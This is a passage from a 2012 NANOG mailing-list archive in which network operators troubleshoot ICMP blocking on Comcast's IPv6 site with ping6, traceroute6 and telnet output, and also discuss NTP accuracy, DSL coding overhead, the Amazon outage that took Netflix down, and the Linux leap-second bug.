06:06:42 2012 From: John_Brzozowski at Cable.Comcast.com (Brzozowski, John) Date: Mon, 2 Jul 2012 11:06:42 +0000 Subject: NANOG Digest, Vol 54, Issue 3 (Comcast's IPv6 Information Site Unreachable) In-Reply-To: References: Message-ID: Folks, We will report back shortly with some updates. Thanks for the mail. John ========================================= John Jason Brzozowski Comcast Cable m) +1-609-377-6594 e) mailto:john_brzozowski at cable.comcast.com o) +1-484-962-0060 w) http://www.comcast6.net ========================================= On Jul 1, 2012, at 10:46 PM, wrote: > Send NANOG mailing list submissions to > nanog at nanog.org > > To subscribe or unsubscribe via the World Wide Web, visit > https://mailman.nanog.org/mailman/listinfo/nanog > or, via email, send a message with subject or body 'help' to > nanog-request at nanog.org > > You can reach the person managing the list at > nanog-owner at nanog.org > > When replying, please edit your Subject line so it is more specific > than "Re: Contents of NANOG digest..." > > > Today's Topics: > > 1. Re: Comcast's IPv6 Information Site Unreachable (Sadiq Saif) > 2. RE: Comcast's IPv6 Information Site Unreachable (Frank Bulk) > 3. Re: Comcast's IPv6 Information Site Unreachable (Derek Ivey) > 4. Re: [c-nsp] NTP Servers (Jimmy Hess) > 5. Re: Comcast's IPv6 Information Site Unreachable (Jimmy Hess) > 6. Re: FYI Netflix is down (steve pirk [egrep]) > 7. Re: Comcast's IPv6 Information Site Unreachable (Derek Ivey) > > > ---------------------------------------------------------------------- > > Message: 1 > Date: Sun, 1 Jul 2012 19:37:54 -0400 > From: Sadiq Saif > To: Derek Ivey > Cc: nanog at nanog.org > Subject: Re: Comcast's IPv6 Information Site Unreachable > Message-ID: > > Content-Type: text/plain; charset=UTF-8 > > Website is reachable here via my HE tunnel. Pings are not going > through though as you showed. > > On Sun, Jul 1, 2012 at 7:28 PM, Derek Ivey wrote: >> Anyone else having trouble getting to Comcast's IPv6 Information site? It >> appears to be unreachable over IPv6. >> >> [root at server ~]# ping6 comcast6.net >> PING comcast6.net(speedlab-app05.newcastlerdc.de.panjde.comcast.net) 56 data >> bytes >> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=0 Destination >> unreachable: Administratively prohibited >> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=1 Destination >> unreachable: Administratively prohibited >> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=2 Destination >> unreachable: Administratively prohibited >> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=3 Destination >> unreachable: Administratively prohibited >> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=4 Destination >> unreachable: Administratively prohibited >> ^C >> --- comcast6.net ping statistics --- >> 5 packets transmitted, 0 received, +5 errors, 100% packet loss, time 4008ms >> >> [root at server ~]# traceroute6 comcast6.net >> traceroute to comcast6.net (2001:558:fe16:7:69:252:216:215), 30 hops max, 40 >> byte packets >> 1 pfsense.d3r3k.net (2001:470:8:d15::1) 0.278 ms 0.282 ms 0.317 ms >> 2 2001:470:7:d15::1 (2001:470:7:d15::1) 20.794 ms 24.746 ms 28.569 ms >> 3 gige-g4-12.core1.ash1.he.net (2001:470:0:90::1) 28.946 ms 29.124 ms >> 29.144 ms >> 4 as6453.gige-g3-16.core1.ash1.he.net (2001:470:0:191::2) 28.917 ms >> 28.936 ms 28.097 ms >> 5 if-ae2.2.tcore2.AEQ-Ashburn.ipv6.as6453.net (2001:5a0:600:500::1) >> 28.059 ms 31.771 ms 57.135 ms >> 6 2001:5a0:600:500::72 (2001:5a0:600:500::72) 28.959 ms 2001:559::31d >> (2001:559::31d) 29.041 ms 29.060 ms >> 7 pos-3-11-0-0-cr01.ashburn.va.ibone.comcast.net (2001:558:0:f5a4::1) >> 32.553 ms 19.810 ms 16.526 ms >> 8 2001:558:0:f669::2 (2001:558:0:f669::2) 39.019 ms 37.954 ms 36.368 ms >> 9 2001:558:0:f57f::1 (2001:558:0:f57f::1) 67.134 ms 67.151 ms 67.166 ms >> 10 pos-2-7-0-0-cr01.denver.co.ibone.comcast.net (2001:558:0:f54d::1) >> 81.571 ms 81.507 ms 81.569 ms >> 11 2001:558:0:f744::2 (2001:558:0:f744::2) 80.633 ms 80.760 ms 79.825 ms >> 12 2001:558:d0:33::1 (2001:558:d0:33::1) 104.686 ms 105.060 ms 105.040 ms >> 13 te-3-1-ur03.cmc.co.ndcwest.comcast.net (2001:558:d0:5::1) 104.335 ms >> 103.962 ms 104.068 ms >> 14 te-3-1-ur03.cmc.co.ndcwest.comcast.net (2001:558:d0:5::1) 104.492 ms !X >> 104.597 ms !X 104.999 ms !X >> >> Thanks, >> Derek >> > > > > -- > Sadiq S > O< ascii ribbon campaign - stop html mail - www.asciiribbon.org > > > > ------------------------------ > > Message: 2 > Date: Sun, 1 Jul 2012 20:35:24 -0500 > From: "Frank Bulk" > To: "'Derek Ivey'" , > Subject: RE: Comcast's IPv6 Information Site Unreachable > Message-ID: <000201cd57f2$f3973e90$dac5bbb0$@iname.com> > Content-Type: text/plain; charset="us-ascii" > > ICMP to www.comcast6.net has been blocked since 3:16 pm Central on 6/7/2012. > But their site loads fine over port 80. > > Frank > > -----Original Message----- > From: Derek Ivey [mailto:derek at derekivey.com] > Sent: Sunday, July 01, 2012 6:28 PM > To: nanog at nanog.org > Subject: Comcast's IPv6 Information Site Unreachable > > Anyone else having trouble getting to Comcast's IPv6 Information site? > It appears to be unreachable over IPv6. > > [root at server ~]# ping6 comcast6.net > PING comcast6.net(speedlab-app05.newcastlerdc.de.panjde.comcast.net) 56 > data bytes > From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=0 > Destination unreachable: Administratively prohibited > From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=1 > Destination unreachable: Administratively prohibited > From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=2 > Destination unreachable: Administratively prohibited > From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=3 > Destination unreachable: Administratively prohibited > From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=4 > Destination unreachable: Administratively prohibited > ^C > --- comcast6.net ping statistics --- > 5 packets transmitted, 0 received, +5 errors, 100% packet loss, time 4008ms > > [root at server ~]# traceroute6 comcast6.net > traceroute to comcast6.net (2001:558:fe16:7:69:252:216:215), 30 hops > max, 40 byte packets > 1 pfsense.d3r3k.net (2001:470:8:d15::1) 0.278 ms 0.282 ms 0.317 ms > 2 2001:470:7:d15::1 (2001:470:7:d15::1) 20.794 ms 24.746 ms 28.569 ms > 3 gige-g4-12.core1.ash1.he.net (2001:470:0:90::1) 28.946 ms 29.124 > ms 29.144 ms > 4 as6453.gige-g3-16.core1.ash1.he.net (2001:470:0:191::2) 28.917 ms > 28.936 ms 28.097 ms > 5 if-ae2.2.tcore2.AEQ-Ashburn.ipv6.as6453.net (2001:5a0:600:500::1) > 28.059 ms 31.771 ms 57.135 ms > 6 2001:5a0:600:500::72 (2001:5a0:600:500::72) 28.959 ms > 2001:559::31d (2001:559::31d) 29.041 ms 29.060 ms > 7 pos-3-11-0-0-cr01.ashburn.va.ibone.comcast.net > (2001:558:0:f5a4::1) 32.553 ms 19.810 ms 16.526 ms > 8 2001:558:0:f669::2 (2001:558:0:f669::2) 39.019 ms 37.954 ms 36.368 ms > 9 2001:558:0:f57f::1 (2001:558:0:f57f::1) 67.134 ms 67.151 ms 67.166 ms > 10 pos-2-7-0-0-cr01.denver.co.ibone.comcast.net (2001:558:0:f54d::1) > 81.571 ms 81.507 ms 81.569 ms > 11 2001:558:0:f744::2 (2001:558:0:f744::2) 80.633 ms 80.760 ms 79.825 ms > 12 2001:558:d0:33::1 (2001:558:d0:33::1) 104.686 ms 105.060 ms 105.040 ms > 13 te-3-1-ur03.cmc.co.ndcwest.comcast.net (2001:558:d0:5::1) 104.335 > ms 103.962 ms 104.068 ms > 14 te-3-1-ur03.cmc.co.ndcwest.comcast.net (2001:558:d0:5::1) 104.492 ms > !X 104.597 ms !X 104.999 ms !X > > Thanks, > Derek > > > > > > > ------------------------------ > > Message: 3 > Date: Sun, 01 Jul 2012 21:44:40 -0400 > From: Derek Ivey > To: Frank Bulk > Cc: nanog at nanog.org > Subject: Re: Comcast's IPv6 Information Site Unreachable > Message-ID: <4FF0FD08.8050706 at derekivey.com> > Content-Type: text/plain; charset=ISO-8859-1; format=flowed > > Thanks for the input guys! Sounds like it might be an issue with my > tunnel then. I had problems getting to a few sites last week > (http://www.dslreports.com/forum/r27265527-IPV6-Issues-Facebook-and-Engadget) > and HE resolved the issue pretty quickly. I will ask them if they are > aware of it. > > Thanks, > Derek > > > On 7/1/2012 9:35 PM, Frank Bulk wrote: >> ICMP to www.comcast6.net has been blocked since 3:16 pm Central on 6/7/2012. >> But their site loads fine over port 80. >> >> Frank >> >> -----Original Message----- >> From: Derek Ivey [mailto:derek at derekivey.com] >> Sent: Sunday, July 01, 2012 6:28 PM >> To: nanog at nanog.org >> Subject: Comcast's IPv6 Information Site Unreachable >> >> Anyone else having trouble getting to Comcast's IPv6 Information site? >> It appears to be unreachable over IPv6. >> >> [root at server ~]# ping6 comcast6.net >> PING comcast6.net(speedlab-app05.newcastlerdc.de.panjde.comcast.net) 56 >> data bytes >> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=0 >> Destination unreachable: Administratively prohibited >> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=1 >> Destination unreachable: Administratively prohibited >> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=2 >> Destination unreachable: Administratively prohibited >> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=3 >> Destination unreachable: Administratively prohibited >> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=4 >> Destination unreachable: Administratively prohibited >> ^C >> --- comcast6.net ping statistics --- >> 5 packets transmitted, 0 received, +5 errors, 100% packet loss, time 4008ms >> >> [root at server ~]# traceroute6 comcast6.net >> traceroute to comcast6.net (2001:558:fe16:7:69:252:216:215), 30 hops >> max, 40 byte packets >> 1 pfsense.d3r3k.net (2001:470:8:d15::1) 0.278 ms 0.282 ms 0.317 ms >> 2 2001:470:7:d15::1 (2001:470:7:d15::1) 20.794 ms 24.746 ms 28.569 ms >> 3 gige-g4-12.core1.ash1.he.net (2001:470:0:90::1) 28.946 ms 29.124 >> ms 29.144 ms >> 4 as6453.gige-g3-16.core1.ash1.he.net (2001:470:0:191::2) 28.917 ms >> 28.936 ms 28.097 ms >> 5 if-ae2.2.tcore2.AEQ-Ashburn.ipv6.as6453.net (2001:5a0:600:500::1) >> 28.059 ms 31.771 ms 57.135 ms >> 6 2001:5a0:600:500::72 (2001:5a0:600:500::72) 28.959 ms >> 2001:559::31d (2001:559::31d) 29.041 ms 29.060 ms >> 7 pos-3-11-0-0-cr01.ashburn.va.ibone.comcast.net >> (2001:558:0:f5a4::1) 32.553 ms 19.810 ms 16.526 ms >> 8 2001:558:0:f669::2 (2001:558:0:f669::2) 39.019 ms 37.954 ms 36.368 ms >> 9 2001:558:0:f57f::1 (2001:558:0:f57f::1) 67.134 ms 67.151 ms 67.166 ms >> 10 pos-2-7-0-0-cr01.denver.co.ibone.comcast.net (2001:558:0:f54d::1) >> 81.571 ms 81.507 ms 81.569 ms >> 11 2001:558:0:f744::2 (2001:558:0:f744::2) 80.633 ms 80.760 ms 79.825 ms >> 12 2001:558:d0:33::1 (2001:558:d0:33::1) 104.686 ms 105.060 ms 105.040 ms >> 13 te-3-1-ur03.cmc.co.ndcwest.comcast.net (2001:558:d0:5::1) 104.335 >> ms 103.962 ms 104.068 ms >> 14 te-3-1-ur03.cmc.co.ndcwest.comcast.net (2001:558:d0:5::1) 104.492 ms >> !X 104.597 ms !X 104.999 ms !X >> >> Thanks, >> Derek >> >> >> > > > > > > ------------------------------ > > Message: 4 > Date: Sun, 1 Jul 2012 20:59:42 -0500 > From: Jimmy Hess > To: PC > Cc: "nanog at nanog.org" > Subject: Re: [c-nsp] NTP Servers > Message-ID: > > Content-Type: text/plain; charset=ISO-8859-1 > > On 7/1/12, PC wrote: >> If your application requires sub-5 second accuracy, (such as end of a >> banking day), then Windows NTP is unsuitable for the purpose. > Looks like CYA on Microsoft's part. > > That i've seen, Windows NTP in physical environments with a hardware > system clock not having issues consistently provides accuracy better > than +/- 0.5 against the time source it's synced with, but in > virtual environments, which have incompatibilities with high > sub-second RTC accuracy in the first place, neither Windows nor Unix > NTP services are able to provide that consistently without much > tinkering. > > If it's absolutely critical that you have sub-5 second accuracy, > even Unix NTP is not to be considered good enough, you need highly > accurate hardware time source, something more accurate than the usual > system clock you find in a PC or server. Unix NTP can only do so much > to correct for a broken system clock; although it does do a very > good job disciplining PC real-time clocks that consistently run a bit > too fast or too slow, ultimately the > personal computer clocks can at times be unreliable.... > > If they were perfect, you wouldn't need time sync in the first place; > just set them once, > and correct the annual 0.01 seconds worth of error once a year.... > > -- > -JH > > > > ------------------------------ > > Message: 5 > Date: Sun, 1 Jul 2012 21:20:11 -0500 > From: Jimmy Hess > To: Derek Ivey > Cc: nanog at nanog.org > Subject: Re: Comcast's IPv6 Information Site Unreachable > Message-ID: > > Content-Type: text/plain; charset=ISO-8859-1 > > On 7/1/12, Derek Ivey wrote: >> Anyone else having trouble getting to Comcast's IPv6 Information site? >> It appears to be unreachable over IPv6. > > Looks like just ICMP that's broken. > > ~# telnet comcast6.net 80 > Trying 2001:558:fe23:2:69:252:208:135... > Connected to comcast6.net (2001:558:fe23:2:69:252:208:135). > Escape character is '^]'. > HEAD / HTTP/1.1 > Host: comcast6.net > User-Agent: Telnet > > HTTP/1.1 200 OK > Date: Mon, 02 Jul 2012 02:21:33 GMT > Server: Apache/2.2.15 (Red Hat) > X-Powered-By: PHP/5.3.3 > Set-Cookie: 1a3c31c9847a772452af472ce0afd5f3=5hcm2m506se424huah4eo5lvo7; path=/ > P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" > Cache-Control: no-cache > Pragma: no-cache > Connection: close > Content-Type: text/html; charset=utf-8 > > Connection closed by foreign host. > > > > ~# ping6 comcast6.net > PING comcast6.net(speedlab-app05.newcastlerdc.de.panjde.comcast.net) > 56 data bytes >> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=0 > Destination unreachable: Administratively prohibited >> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=1 > Destination unreachable: Administratively prohibited >> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=2 > Destination unreachable: Administratively prohibited >> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=3 > Destination unreachable: Administratively prohibited >> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=4 > Destination unreachable: Administratively prohibited >> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=5 > Destination unreachable: Administratively prohibited >> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=6 > Destination unreachable: Administratively prohibited >> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=7 > Destination unreachable: Administratively prohibited > > --- comcast6.net ping statistics --- > 8 packets transmitted, 0 received, +8 errors, 100% packet loss, time 6999ms > > > > ------------------------------ > > Message: 6 > Date: Sun, 1 Jul 2012 19:38:16 -0700 > From: "steve pirk [egrep]" > To: Jay Ashworth > Cc: NANOG > Subject: Re: FYI Netflix is down > Message-ID: > > Content-Type: text/plain; charset=windows-1252 > > On Sun, Jul 1, 2012 at 11:38 AM, Jay Ashworth wrote: > >> Not entirely. Datacenters do go down, our best efforts to the contrary >> notwithstanding. Amazon doesn't guarantee you redundancy on EC2, only >> the tools to provide it yourself. 25% Amazon; 75% service provider >> clients; >> that's my appraisal of the blame. >> > >> From a Wired article: > >> That?s what was supposed to happen at Netflix Friday night. But it didn?t >> work out that way. According to Twitter messages from Netflix Director of >> Cloud Architecture Adrian Cockcroft and Instagram Engineer Rick Branson, it >> looks like an Amazon Elastic Load Balancing service, designed to spread >> Netflix?s processing loads across data centers, failed during the outage. >> Without that ELB service working properly, the Netflix and Pintrest >> services hosted by Amazon crashed. > > http://www.wired.com/wiredenterprise/2012/06/real-clouds-crush-amazon/ > > The GSLB fail-over that was supposed to take place for the affected > services (that had configured their applications to fail-over) failed. > > I heard about this the day after Google announced the Compute Engine > addition to the App Engine product lines they have. The demo was awesome. > I imagine Google has GSLB down pat by now, so some companies might start > looking... ;-] > > --steve > > > ------------------------------ > > Message: 7 > Date: Sun, 01 Jul 2012 22:45:51 -0400 > From: Derek Ivey > To: Jimmy Hess > Cc: nanog at nanog.org > Subject: Re: Comcast's IPv6 Information Site Unreachable > Message-ID: <4FF10B5F.2090205 at derekivey.com> > Content-Type: text/plain; charset=ISO-8859-1; format=flowed > > Someone replied to my DSL Reports thread: > http://www.dslreports.com/forum/r27289866- > > Apparently there is an ACL issue with their load balancer that is > blocking ICMP and causing PMTU issues for people who use tunnels. > > http://www.dslreports.com/forum/r27226136- > > > It looks like it's been going on since June 11. It's strange that > Comcast hasn't resolved the issue by now. > > Thanks, > Derek > > On 7/1/2012 10:20 PM, Jimmy Hess wrote: >> On 7/1/12, Derek Ivey wrote: >>> Anyone else having trouble getting to Comcast's IPv6 Information site? >>> It appears to be unreachable over IPv6. >> Looks like just ICMP that's broken. >> >> ~# telnet comcast6.net 80 >> Trying 2001:558:fe23:2:69:252:208:135... >> Connected to comcast6.net (2001:558:fe23:2:69:252:208:135). >> Escape character is '^]'. >> HEAD / HTTP/1.1 >> Host: comcast6.net >> User-Agent: Telnet >> >> HTTP/1.1 200 OK >> Date: Mon, 02 Jul 2012 02:21:33 GMT >> Server: Apache/2.2.15 (Red Hat) >> X-Powered-By: PHP/5.3.3 >> Set-Cookie: 1a3c31c9847a772452af472ce0afd5f3=5hcm2m506se424huah4eo5lvo7; path=/ >> P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" >> Cache-Control: no-cache >> Pragma: no-cache >> Connection: close >> Content-Type: text/html; charset=utf-8 >> >> Connection closed by foreign host. >> >> >> >> ~# ping6 comcast6.net >> PING comcast6.net(speedlab-app05.newcastlerdc.de.panjde.comcast.net) >> 56 data bytes >> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=0 >> Destination unreachable: Administratively prohibited >> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=1 >> Destination unreachable: Administratively prohibited >> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=2 >> Destination unreachable: Administratively prohibited >> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=3 >> Destination unreachable: Administratively prohibited >> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=4 >> Destination unreachable: Administratively prohibited >> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=5 >> Destination unreachable: Administratively prohibited >> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=6 >> Destination unreachable: Administratively prohibited >> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=7 >> Destination unreachable: Administratively prohibited >> >> --- comcast6.net ping statistics --- >> 8 packets transmitted, 0 received, +8 errors, 100% packet loss, time 6999ms > > > > > End of NANOG Digest, Vol 54, Issue 3 > ************************************ From stb at lassitu.de Mon Jul 2 06:25:43 2012 From: stb at lassitu.de (Stefan Bethke) Date: Mon, 2 Jul 2012 13:25:43 +0200 Subject: How do the lowest layers of the DSL stack work? In-Reply-To: References: Message-ID: Am 01.07.2012 um 21:01 schrieb James Bensley: > [15.24 Mbit/s raw bit rate compared to 8.128 Mbit/s net] is quite a drop in speed and I'm trying to understand where this is happening. ... > According to that extract, it all disappeared because of [Reed-Solomon] encoding, which is hugely vague. http://en.wikipedia.org/wiki/Reed-Solomon_error_correction#Data_storage The second paragraph explains that typically the raw bit rate is twice the net rate. The raw bitstream is then encoded further as HDLC or ATM. Stefan -- Stefan Bethke Fon +49 151 14070811 From dgolding at ragingwire.com Mon Jul 2 10:01:59 2012 From: dgolding at ragingwire.com (Dan Golding) Date: Mon, 2 Jul 2012 08:01:59 -0700 Subject: FYI Netflix is down In-Reply-To: References: <4FEE753C.4030007@thebaughers.com> <8078ED370ADA824281219A7B5BADC39B1D61037C@MBX023-W1-CA-5> <4FEE7671.2060403@thebaughers.com> <4FEF19DC.9020901@rollernet.us> <4FEF4394.2030108@rollernet.us> Message-ID: <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> > -----Original Message----- > From: Todd Underwood [mailto:toddunder at gmail.com] > > scott, > > >> > >> This was not a cascading failure. ?It was a simple power outage Actually, it was a very complex power outage. I'm going to assume that what happened this weekend was similar to the event that happened at the same facility approximately two weeks ago (its immaterial - the details are probably different, but it illustrates the complexity of a data center failure) Utility Power Failed First Backup Generator Failed (shut down due to a faulty fan) Second Backup Generator Failed (breaker coordination problem resulting in faulty trip of a breaker) In this case, it was clearly a cascading failure, although only limited in scope. The failure in this case, also clearly involved people. There was one material failure (the fan), but the system should have been resilient enough to deal with it. The system should also have been resilient enough to deal with the breaker coordination issue (which should not have occurred), but was not. Data centers are not commodities. There is a way to engineer these facilities to be much more resilient. Not everyone's business model supports it. - Dan > >> > >> Cascading failures involve interdependencies among components. > > > > > > Not always.? Cascading failures can also occur when there is zero > > dependency between components.? The simplest form of this is where > one > > environment fails over to another, but the target environment is not > > capable of handling the additional load and then "fails" itself as a > > result (in some form or other, but frequently different to the mode > of the original failure). > > indeed. and that is an interdependency among components. in > particular, it is a capacity interdependency. > > > Whilst the Amazon outage might have been a "simple" power outage, > it's > > likely that at least some of the website outages caused were a > > combination of not just the direct Amazon outage, but also the flow- > on > > effect of their redundancy attempting (but failing) to kick in - > > potentially making the problem worse than just the Amazon outage > caused. > > i think you over-estimate these websites. most of them simply have no > redundancy (and obviously have no tested, effective redundancy) and > were simply hoping that amazon didn't really go down that much. > > hope is not the best strategy, as it turns out. > > i suspect that randy is right though: many of these businesses do not > promise perfect uptime and can survive these kinds of failures with > little loss to business or reputation. twitter has branded it's early > failures with a whale that no only didn't hurt it but helped endear the > service to millions. when your service fits these criteria, why would > you bother doing the complicated systems and application engineering > necessary to actually have functional redundancy? > > it simply isn't worth it. > > t > > > > > ? Scott From toddunder at gmail.com Mon Jul 2 10:30:06 2012 From: toddunder at gmail.com (Todd Underwood) Date: Mon, 2 Jul 2012 11:30:06 -0400 Subject: FYI Netflix is down In-Reply-To: <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> References: <4FEE753C.4030007@thebaughers.com> <8078ED370ADA824281219A7B5BADC39B1D61037C@MBX023-W1-CA-5> <4FEE7671.2060403@thebaughers.com> <4FEF19DC.9020901@rollernet.us> <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> Message-ID: > Actually, it was a very complex power outage. I'm going to assume that what happened this weekend was similar to the event that happened at the same facility approximately two weeks ago (its immaterial - the details are probably different, but it illustrates the complexity of a data center failure) > > Utility Power Failed > First Backup Generator Failed (shut down due to a faulty fan) > Second Backup Generator Failed (breaker coordination problem resulting in faulty trip of a breaker) > > In this case, it was clearly a cascading failure, although only limited in scope. The failure in this case, also clearly involved people. There was one material failure (the fan), but the system should have been resilient enough to deal with it. The system should also have been resilient enough to deal with the breaker coordination issue (which should not have occurred), but was not. Data centers are not commodities. There is a way to engineer these facilities to be much more resilient. Not everyone's business model supports it. ok, i give in. as some level of granularity everything is a cascading failure (since molecules colide and the world is an infinite chain of causation in which human free will is merely a myth ) of course, this use of 'cascading' is vacuous and not useful anymore since it applies to nearly every failure, but i'll go along with it. from the perspective of a datacenter power engineer, this was a cascading failure of a few small number of components. from the perspective of every datacenter customer: this was a power failure. from the perspective of people watching B-rate movies: this was a failure to implement and test a reliable system for streaming those movies in the face of a power outage at one facility. from the perspective of nanog mailing list readers: this was an interesting opportunity to speculate about failures about which we have no data (as usual!). can we all agree on those facts? :-) t From nanog at armoredpackets.com Mon Jul 2 10:41:00 2012 From: nanog at armoredpackets.com (AP NANOG) Date: Mon, 02 Jul 2012 11:41:00 -0400 Subject: FYI Netflix is down In-Reply-To: <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> References: <4FEE753C.4030007@thebaughers.com> <8078ED370ADA824281219A7B5BADC39B1D61037C@MBX023-W1-CA-5> <4FEE7671.2060403@thebaughers.com> <4FEF19DC.9020901@rollernet.us> <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> Message-ID: <4FF1C10C.5010201@armoredpackets.com> While I was working for a wireless telecom company our primary datacenter was knocked off the power grid due to weather, the generators kicked on and everything was fine, till one generator was struck by lighting and that same strike fried the control panel on the second one. Considering the second generator had no control panel we had no means of monitoring it for temp, fuel, input voltage (when it came back), output voltage, surge protection, or ultimately if the generator spiked to go full voltage due to a regulator failure. Needless to say we had to shut the second generator down for safety reasons. While in the military I seen many generators struck by lighting as well. Im not saying Amazon was not at fault here, but I can see where this is possible and happens more frequently than one might think. I hate to play devils advocate here, but you as the customer should always have backups to your backups, and practice these fail-overs on a regular basis. Otherwise you are the fault here, no one else... -- Thank you, Robert Miller http://www.armoredpackets.com Twitter: @arch3angel On 7/2/12 11:01 AM, Dan Golding wrote: >> -----Original Message----- >> From: Todd Underwood [mailto:toddunder at gmail.com] >> >> scott, >> >>>> This was not a cascading failure. It was a simple power outage > Actually, it was a very complex power outage. I'm going to assume that what happened this weekend was similar to the event that happened at the same facility approximately two weeks ago (its immaterial - the details are probably different, but it illustrates the complexity of a data center failure) > > Utility Power Failed > First Backup Generator Failed (shut down due to a faulty fan) > Second Backup Generator Failed (breaker coordination problem resulting in faulty trip of a breaker) > > In this case, it was clearly a cascading failure, although only limited in scope. The failure in this case, also clearly involved people. There was one material failure (the fan), but the system should have been resilient enough to deal with it. The system should also have been resilient enough to deal with the breaker coordination issue (which should not have occurred), but was not. Data centers are not commodities. There is a way to engineer these facilities to be much more resilient. Not everyone's business model supports it. > > - Dan > > >>>> Cascading failures involve interdependencies among components. >>> >>> Not always. Cascading failures can also occur when there is zero >>> dependency between components. The simplest form of this is where >> one >>> environment fails over to another, but the target environment is not >>> capable of handling the additional load and then "fails" itself as a >>> result (in some form or other, but frequently different to the mode >> of the original failure). >> >> indeed. and that is an interdependency among components. in >> particular, it is a capacity interdependency. >> >>> Whilst the Amazon outage might have been a "simple" power outage, >> it's >>> likely that at least some of the website outages caused were a >>> combination of not just the direct Amazon outage, but also the flow- >> on >>> effect of their redundancy attempting (but failing) to kick in - >>> potentially making the problem worse than just the Amazon outage >> caused. >> >> i think you over-estimate these websites. most of them simply have no >> redundancy (and obviously have no tested, effective redundancy) and >> were simply hoping that amazon didn't really go down that much. >> >> hope is not the best strategy, as it turns out. >> >> i suspect that randy is right though: many of these businesses do not >> promise perfect uptime and can survive these kinds of failures with >> little loss to business or reputation. twitter has branded it's early >> failures with a whale that no only didn't hurt it but helped endear the >> service to millions. when your service fits these criteria, why would >> you bother doing the complicated systems and application engineering >> necessary to actually have functional redundancy? >> >> it simply isn't worth it. >> >> t >> >>> Scott From nanog at armoredpackets.com Mon Jul 2 10:47:29 2012 From: nanog at armoredpackets.com (AP NANOG) Date: Mon, 02 Jul 2012 11:47:29 -0400 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> References: <4FEFB944.2010006@paulgraydon.co.uk> <596B74B410EE6B4CA8A30C3AF1A155EA09DF80D3@RWC-MBX1.corp.seven.com> <596B74B410EE6B4CA8A30C3AF1A155EA09DF8311@RWC-MBX1.corp.seven.com> <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> Message-ID: <4FF1C291.80307@armoredpackets.com> Do you happen to know all the kernels and versions affected by this? -- Thank you, Robert Miller http://www.armoredpackets.com Twitter: @arch3angel On 7/1/12 12:44 PM, George Bonser wrote: > >> -----Original Message----- >> From: Roy >> Sent: Saturday, June 30, 2012 10:03 PM >> To: nanog at nanog.org >> Subject: Re: F-ckin Leap Seconds, how do they work? >> >> >> Talk about people not testing things, leap seconds have been around >> since 1961. There have been nine leap seconds in the last twenty >> years. Any system that can't handle a leap second is seriously flawed. >> > Roy, this was a problem in only certain kernel versions. Unfortunately the range of versions affected are pretty widely deployed right now. Earlier and later versions did not have the problem. > > > > From a.harrowell at gmail.com Mon Jul 2 10:51:41 2012 From: a.harrowell at gmail.com (Alex Harrowell) Date: Mon, 02 Jul 2012 16:51:41 +0100 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <4FF1C291.80307@armoredpackets.com> References: <4FEFB944.2010006@paulgraydon.co.uk> <596B74B410EE6B4CA8A30C3AF1A155EA09DF80D3@RWC-MBX1.corp.seven.com> <596B74B410EE6B4CA8A30C3AF1A155EA09DF8311@RWC-MBX1.corp.seven.com> <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> Message-ID: <4FF1C38D.9050009@gmail.com> On 02/07/12 16:47, AP NANOG wrote: > Do you happen to know all the kernels and versions affected by this? > 2.6.26 to 3.3 inclusive per news.ycombinator.com/item?id=4183122 From jra at baylink.com Mon Jul 2 11:04:04 2012 From: jra at 